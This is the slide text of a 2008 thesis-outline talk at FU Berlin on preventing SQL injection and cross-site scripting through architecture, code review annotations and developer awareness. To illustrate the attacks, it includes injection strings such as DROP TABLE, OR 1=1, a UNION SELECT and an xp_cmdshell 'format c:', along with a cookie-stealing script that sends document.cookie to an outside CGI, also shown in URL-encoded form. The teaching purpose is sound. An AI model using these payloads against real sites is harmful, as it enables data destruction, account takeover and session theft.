Whatever it takes Fixing SQLIA and XSS in the process Diploma Thesis Outline Presentation, Florian Thiel Seminar Beiträge zum Software Engineering, FU Berlin, 11/06/2008
OWASP Top 10 2007 1. XSS 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross-Site Request Forgery
OWASP Top 10 2007 1. XSS 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross-Site Request Forgery
by xckd: http://xkcd.com/327/
by xckd: http://xkcd.com/327/
SELECT firstname FROM Students WHERE (login = %s ); % login by xckd: http://xkcd.com/327/
SELECT firstname FROM Students WHERE (login = %s ); % login by xckd: http://xkcd.com/327/ SELECT firstname FROM Students WHERE (login = Robert ); DROP TABLE Students; -- );
SQLIA threats data integrity confidentiality new attack vector
UPDATE Users SET password = %s WHERE uid = %s ; % (pw, uid)
UPDATE Users SET password = password WHERE uid = robert OR 1=1; -- ; Integrity
SELECT product FROM Products WHERE productid = %s ; % pid
SELECT product FROM Products WHERE productid = 0 UNION SELECT owner, balance FROM Accounts; -- ; Confidentiality
SELECT product, price FROM products WHERE category = %s ; % category
SELECT product, price FROM products WHERE categoryid = exec master..xp_cmdshell format c: -- ; New Attack Vector
Bad Mitigations PHP: addslashes() IDS blacklisting validation blacklisting
Decent Mitigations stmt = prepare( SELECT name FROM Users WHERE uid = $1 ) db.execute(stmt, uid)
Why it s hard Control Data
More problems validation context!= execution context really tolerant DBs SEL + ECT, anyone? DBs trying to fix illegal SQL
Something different!? http://searchsite/search? keyword= <script>alert( you have been XSSed! )</script>
Something different!? http://searchsite/search? keyword= <script>alert( you have been XSSed! )</script>
This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>. -- Marc Slemko, Apache.org
eval( user input ) 1,2 1) the essence of XSS 2) limited only by the execution environment
XSS code injection popular in ECMAScript/Web2.0
Got cookies? <script>document.location='http:// www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
Got cookies? %3c%73%63%72%69%70%74%3e%64%6f %63%75%6d%65%6e%74%2e%6c%6f %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e %63%67%69%73%65%63%75%72 %69%74%79%2e%63%6f%6d%2f%63%67%69%2d %62%69%6e %2f%63%6f%6f%6b %69%65%2e%63%67%69%3f%27%20%2b%64%6f %63%75%6d%65%6e%74%2e%63%6f%6f%6b %69%65%3c %2f%73%63%72%69%70%74%3e
The Worm
(Non-working) XSS Mitigations blacklisting of cribs blacklisting of characters
helpful mitigations HTTPOnly cookies Whitelisting of characters
Common flaws HTML/XSS and SQL mix data and control have no well-defined execution environment
Common flaws HTML/XSS and SQL mix data and control have no well-defined execution environment have no API
Failure to sanitize data into a different plane
Safe Query Objects real SQL API adds static types dynamic queries still runtime evaluated
AntiSamy Policy-based sanitation for HTML entities Types (by RegEx) (no semantics)
Another job well done!
GET /en-us/library/aa287673(vs.71).aspx HTTP/1.1 Host: msdn.microsoft.com User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-us; rv: 1.9.0.3) Gecko/2008092414 Firefox/3.0.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.google.de/search?q=http+request+header +example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en- US:official&client=firefox-a Cache-Control: max-age=0
Hmm, are we missing something here?
Absolutely!
The interesting* part * what my thesis is really about
Make sure that the technical solutions are thoroughly applied
1. Make developers use a reasonable architecture 2. Make developers recognize a weakness when they meet one 3. Make developers find weaknesses 4. Make people actually fix things
1) (Architecture) centralization canonicalization have to be conservative
2) (Recognition) patterns? flawed code examples in the wild
3) (Detection) automated flow analysis code inspection
Code inspection need a reading technique defect-based reading
Artifacts reviewer annotates suspicious code regions e.g. @userinput, @output makes review work visible in the source code and more valuable since annotations can be reused
// @userinput(data) // [insert data into query, ignore non-alphanums] def insertalphanum(query, data): // [make sure data is canonical] c_data = data.tocharset(...) c_data.replace(...)... // [insert data into query] query.prepare(...) query.insert(data...)...
4) (Repair) once weakness is known, developers should be motivated enough focus is on keeping the code secure, minimizing effort
My tasks provide practical architectural assumptions construct effective reading method + awareness of potential weaknesses get a project to adopt my methods
Questions?
This presentation is licensed under a Creative Commons BY-SA license. Attribution for pictures through links. Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
Thank you!